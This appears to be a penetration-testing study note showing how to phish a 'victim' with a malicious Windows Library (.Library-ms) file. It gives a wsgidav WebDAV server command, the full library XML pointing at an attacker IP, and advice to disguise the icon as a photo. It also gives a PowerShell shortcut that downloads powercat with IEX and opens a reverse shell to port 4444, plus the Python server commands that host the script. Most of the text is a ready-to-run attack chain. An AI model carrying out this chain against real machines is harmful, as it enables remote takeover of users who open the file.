Windows Library Files

Windows Library Files are virtual containers used to connect users with data located in remote locations like web services or SMB shares.

Windows Library Files have a .Library-ms extensions and are executed by double clicking on them.

WebDAV

In order to share our malicious Windows Library file to the victim we will create a WebDAV share to host the staged payload.

Start WebDAV Server

──(env)─(kali㉿kali)-[~/web]
└─$ /home/kali/env/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/web/

Create Windows Library File

We will create a new file on our Windows host and name it "dog.Library-ms".

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.119.5</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Right now the icon is a little suspicious, let's change it to something else, like a photo.

Customizing Library File

Change Icon

<iconReference>imageres.dll, -1003</iconReference>

Testing & Fixing Serialization

We can test to see if it's working by double clicking our "dog" icon on the deskop.

As we see, our malicious Windows Library works! Listing or WebDAV server!

Re-open Visual Studio Code

We can see if the re-open "dog" that the code has been changed. This happens due to Windows trying to optimize the WebDAV communication with the client. So before we ship it off the the victim we have to make sure that we've fixed it and NOT OPENED it on our end.

Delete the serialized tag and fix the url tag with:

<url>http://192.168.119.2</url>

Create Shortcut

We will create a shortcut on the Desktop. This shortcut will download powercat and open a reverse shell. Add the following by: Right-Click Desktop and select New > Shortcut.

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.5:8000/powercat.ps1'); powercat -c 192.168.119.5 -p 4444 -e powershell"

Start Web Server

We will create a python web server to serve the powercat script.

kali@kali:~/beyond$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

kali@kali:~/beyond$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Last updated